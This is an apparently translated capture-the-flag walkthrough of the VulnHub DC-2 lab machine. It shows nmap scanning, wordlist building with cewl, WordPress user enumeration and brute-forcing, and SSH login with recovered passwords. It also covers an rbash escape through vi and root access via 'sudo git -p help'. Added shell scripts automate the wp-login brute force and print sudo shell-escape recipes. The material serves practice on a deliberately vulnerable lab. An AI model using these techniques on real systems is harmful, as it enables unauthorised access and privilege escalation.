Preface

Official page and download: DC: 2 ~ VulnHub

Video tutorial: DC系列靶机DC2通关讲解 (bilibili)

Blog posts:

Vulnhub靶机 DC-2 打靶 渗透详细过程 (FreeBuf)

[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程) (CSDN)

Task: find the 5 hidden flags

About VulnHub: every image contains a target to compromise, mostly boot2root, meaning you boot the VM, work your way up to root on the operating system and read the flags. After learning how the various web vulnerabilities work and how internal-network attacks are carried out, you need hands-on practice to build real experience, and ready-made OS-level target ranges fill that role. The lab is already built: download it, import it into a virtual machine, and start, which saves a great deal of time.

Information gathering

Host discovery on the lab subnet (-sP is the old name for -sn, a ping scan):

nmap -sP 192.168.239.0/24
Host is up (0.0015s latency).
Nmap scan report for bogon (192.168.239.135)

Then a full TCP port scan of the target (-p- means the same as -p 1-65535):

sudo nmap -p 1-65535 192.168.239.135
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu

Note that raqmon-pdu is only the name nmap's services table assigns to port 7744; nothing has been fingerprinted yet. Add -sV (or grab the banner, as done further down) to find out what is really listening there.

Browsing to http://192.168.239.135/ gives the browser error page:

Hmm... can't reach this page
Check if there is a typo in dc-2.

Sometimes the page does load, but without its CSS, so it looks broken.

The cause: WordPress redirects to its configured site name, dc-2, which the attacking machine can't resolve. Add a hosts entry with sudo vim /etc/hosts: the IP, a space, then dc-2.

Windows: edit C:\Windows\System32\drivers\etc\hosts instead.

I puzzled over this for quite a while; the video and the official description both cover it:

Please note that you will need to set the hosts file on your pentesting device to something like:
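The redirect above is something you can detect and fix from the command line rather than by guessing in the browser. The script below is an added example, not code from the original post or from the DC-2 author: it reads the Location header the target sends back, extracts the host name you need, and appends an idempotent entry to a hosts file. The HTTP response in the usage comment and in the offline check is constructed, not captured from DC-2; the IP and the dc-2 name are the ones the post uses.

```shell
#!/bin/sh
# Added example (not from the original post): find out which virtual host the
# target redirects to and add it to a hosts file so the WordPress site loads
# with its CSS. The response headers used offline are constructed samples.

# Print the host part of the Location header from HTTP response headers on stdin.
# "Location: http://dc-2/" -> "dc-2"; port and path are stripped as well.
location_host() {
    tr -d '\r' | awk 'tolower($1) == "location:" {
        sub("^[a-z]+://", "", $2)   # strip the scheme
        sub("[/:].*$", "", $2)      # strip path and port
        print $2
        exit
    }'
}

# Append "<ip>\t<name>" to a hosts file unless a non-comment line already maps
# that name. Safe to run repeatedly; point it at /etc/hosts for real (as root).
add_host() {
    file=$1; ip=$2; name=$3
    if grep -qE "^[^#]*[[:space:]]$name([[:space:]]|\$)" "$file" 2>/dev/null; then
        echo "$name already present in $file"
        return 0
    fi
    printf '%s\t%s\n' "$ip" "$name" >> "$file"
    echo "added $ip $name to $file"
}

# Live use (the only part that touches the network). -D - dumps the response
# headers of a GET, which is more reliable than a HEAD request for this check:
#   host=$(curl -s -o /dev/null -D - http://192.168.239.135/ | location_host)
#   sudo sh -c "printf '%s\t%s\n' 192.168.239.135 $host >> /etc/hosts"
```

Once the entry is in place, curl -sI http://dc-2/ should answer 200 instead of a redirect, and the CSS and the wp-json endpoints used later by wpscan resolve correctly.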

The home page has a Flag page; open it to see the first flag.


Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.

Password brute-forcing

Key word: cewl, which crawls a site and turns the words it finds into a wordlist.

(Side note: tree / -L 2 lists the root directory two levels deep in tree form; don't confuse it with cewl's -w, which names the output file.)

└─$ cewl http://dc-2 -w dc2.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

└─$ cat dc2.txt | wc -l
238

Go to the login page and start brute-forcing: http://192.168.239.135/wp-login.php

admin with every password in the list fails, so enumerate the real usernames with wpscan: wpscan --url http://192.168.239.135/ --enumerate u

Scan Aborted: The URL supplied redirects to http://dc-2/. Use the --ignore-main-redirect option to ignore the redirection and scan the target, or change the --url option value to the redirected URL.

Re-run it against http://dc-2/ (the hosts entry added earlier makes that resolve). Users identified:

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

In the Burp Intruder results a few responses have a Length that differs by 1 from the rest; send those to Comparer to see exactly what changed.

Sorting by Length or by status code makes them stand out. The length difference is only the tell-tale: a real login is a 302 that sets a wordpress_logged_in cookie, while a wrong password just returns the login form again.

Credentials found:

tom parturient

jerry adipiscing

jerry has the higher privileges and can view and edit Pages.
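The same attack can be scripted instead of clicked through in Burp. The block below is an added example, not code from the original post or from the DC-2 author: it POSTs each cewl word to wp-login.php with curl, classifies each response by status code and login cookie, and reproduces the "which responses have a different Length" check in awk. It assumes the dc2.txt wordlist, the users admin/jerry/tom from wpscan and the http://dc-2 vhost from the post; the result lines fed to odd_lengths in the offline check are constructed, not captured.

```shell
#!/bin/sh
# Added example (not from the original post): the Burp Intruder run as a curl
# loop plus the "different Length" check done in awk instead of Comparer.
# Sample result lines used offline are constructed, not captured from DC-2.

# POST one username/password pair to wp-login.php and print
# "user pass status bytes cookie" (cookie=1 when a login cookie came back).
# testcookie is deliberately not posted: WordPress only checks its test cookie
# when testcookie=1 is sent, so leaving it out avoids the "cookies are blocked"
# error without needing a cookie jar.
wp_try() {
    url=$1; user=$2; pass=$3
    hdr=$(mktemp)
    status=$(curl -s -o /dev/null -D "$hdr" -w '%{http_code} %{size_download}' \
        --data-urlencode "log=$user" --data-urlencode "pwd=$pass" \
        --data-urlencode "wp-submit=Log In" "$url/wp-login.php")
    if grep -qi '^set-cookie: wordpress_logged_in_' "$hdr"; then c=1; else c=0; fi
    rm -f "$hdr"
    printf '%s %s %s %s\n' "$user" "$pass" "$status" "$c"
}

# A real hit is a 302 *with* the wordpress_logged_in_ cookie. A bare 302 is
# usually the canonical redirect to the dc-2 vhost (fix /etc/hosts first), and
# a 200 is the login form again, i.e. a failed attempt.
classify() {
    case "$1 $2" in
        302\ 1) echo success ;;
        302\ 0) echo redirect-no-cookie ;;
        *)      echo fail ;;
    esac
}

# Read result lines on stdin and print the ones whose byte count differs from
# the most common one: the "Length differs by 1" trick. Caveat: an unknown
# username changes the error text too, so confirm a hit with classify.
odd_lengths() {
    awk '{ count[$4]++; line[NR] = $0; len[NR] = $4 }
         END {
             best = 0
             for (l in count) if (count[l] > best) { best = count[l]; mode = l }
             for (i = 1; i <= NR; i++) if (len[i] != mode) print line[i]
         }'
}

# Live run (3 users x 238 words = 714 requests):
#   for u in admin jerry tom; do
#       while read -r p; do wp_try http://dc-2 "$u" "$p"; done < dc2.txt
#   done | tee results.txt | odd_lengths
# Summary of outcomes:
#   awk '{ print $3, $5 }' results.txt | while read -r s c; do classify "$s" "$c"; done | sort | uniq -c
```

Keep results.txt: it records every attempt, which is what you need for the write-up, and odd_lengths can be re-run on it without touching the target again.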

Flag 2:

If you can’t exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

So stop looking for WordPress exploits and try another route.

Remember the other open port. Grab its banner with nmap 192.168.239.135 -p 7744 --script=banner (the banner script is quick; -A is the full, deeper scan with version detection and default scripts):

PORT STATE SERVICE
7744/tcp open raqmon-pdu
|_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u7

┌──(kali㉿kali)-[~]
└─$ ssh jerry@192.168.239.135 -p 7744
The authenticity of host '[192.168.239.135]:7744 ([192.168.239.135]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '[192.168.239.135]:7744' (ED25519) to the list of known hosts.
jerry@192.168.239.135's password:
Permission denied, please try again.

jerry is the more privileged user but can't log in over SSH. Try tom's WordPress password on SSH instead; it works, and the restricted shell in the next section is tom's.

Privilege escalation

There isn't even a cat command: the PATH is cut down to a handful of allowed binaries because the login shell is rbash, restricted bash. echo $SHELL confirms it. flag3.txt can still be read with one of the allowed commands (less):

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

tom@DC-2:~$ cd usr
-rbash: cd: restricted

rbash escape through vi (vi is on the allowed list, and rbash can't stop it from spawning a shell once its shell option points at a full bash):

vi
:set shell=/bin/bash   (press Enter)
:shell

The escaped shell still has the crippled PATH, so check it and set a sane one:

echo $PATH
export PATH=/usr/bin:/bin

Then go to /home/jerry, where flag4.txt is readable:

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

Privilege escalation via git

As tom, sudo is a dead end:

tom is not in the sudoers file. This incident will be reported.

Flag 3 hinted at su, and jerry reuses his WordPress password (adipiscing) for his system account, so switch users with su jerry. jerry can't simply become root either:

jerry@DC-2:/home$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for jerry:
Sorry, user jerry is not allowed to execute '/bin/su' as root on DC-2.

Check what jerry is allowed to run as root with sudo -l: git. git shows its help through a pager (less), and at the pager prompt ! runs a shell command as the pager's owner, which under sudo is root:

sudo git -p help
!/bin/bash

Now read the flag in /root:

root@DC-2:/home# cd /root
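Both escalation steps in this section (spotting rbash, and finding that sudo allows a binary with a known shell escape) follow a checklist that is worth scripting. The block below is an added example, not code from the original post or from the DC-2 author: it detects a restricted shell, parses sudo -l output into the list of allowed commands, and prints the pager/editor escape for the ones that have one (git, vi/vim, less/more are the well-known cases). The sudo -l text in the usage comment and in the offline check is constructed, not captured from DC-2.

```shell
#!/bin/sh
# Added example (not from the original post): the three checks to run once you
# have a shell as tom, before reaching for a specific trick. The sudo -l text
# used offline is a constructed sample, not captured from DC-2.

# 1. Restricted shell? rbash shows up in $SHELL and refuses cd outside $HOME.
#    Returns 0 (true) when restrictions are detected.
shell_is_restricted() {
    case "$SHELL" in *rbash) return 0 ;; esac
    ( cd / ) 2>/dev/null || return 0
    return 1
}

# 2. Parse 'sudo -l' output from stdin and print each command the user may run
#    as another user, one per line ("ALL" means anything). Handles both the
#    "(root) NOPASSWD: /usr/bin/git" and "(ALL : ALL) ALL, /usr/bin/vi" forms.
sudo_allowed() {
    awk '/^[[:space:]]*\(/ {
        sub("^[[:space:]]*\\([^)]*\\)[[:space:]]*", "")   # drop "(root) "
        while (sub("^[A-Z]+:[[:space:]]*", "")) { }       # drop NOPASSWD:, SETENV:, ...
        n = split($0, cmd, ",[[:space:]]*")
        for (i = 1; i <= n; i++) print cmd[i]
    }'
}

# 3. Does an allowed binary hand you a shell? git pipes its help through a
#    pager, and at the pager prompt "!/bin/bash" runs bash as the pager's
#    owner, which under sudo is root. Prints the recipe, or returns 1 if
#    nothing is known for that binary.
escape_hint() {
    case "$(basename "$1")" in
        git)       echo "sudo $1 -p help        then type: !/bin/bash" ;;
        vi|vim)    echo "sudo $1 -c ':!/bin/bash'" ;;
        less|more) echo "sudo $1 /etc/profile   then type: !/bin/bash" ;;
        *)         return 1 ;;
    esac
}

# Usage from a working (already escaped) shell:
#   shell_is_restricted && echo "still in rbash: escape via vi first"
#   sudo -l 2>/dev/null | sudo_allowed | while read -r c; do
#       escape_hint "$c" || echo "$c: no known escape"
#   done
```

Run it only after the vi escape and the PATH fix: inside rbash the PATH is too small for awk and basename to be found.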

well done!

root@DC-2:~# cat final-flag.txt 
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

That's it. Step by step, beginner-friendly; I hadn't even heard of many of these privilege-escalation tricks before, so the lesson is to search more, think more, learn more and review more.

Under two hours, and boxes like this are a lot of fun.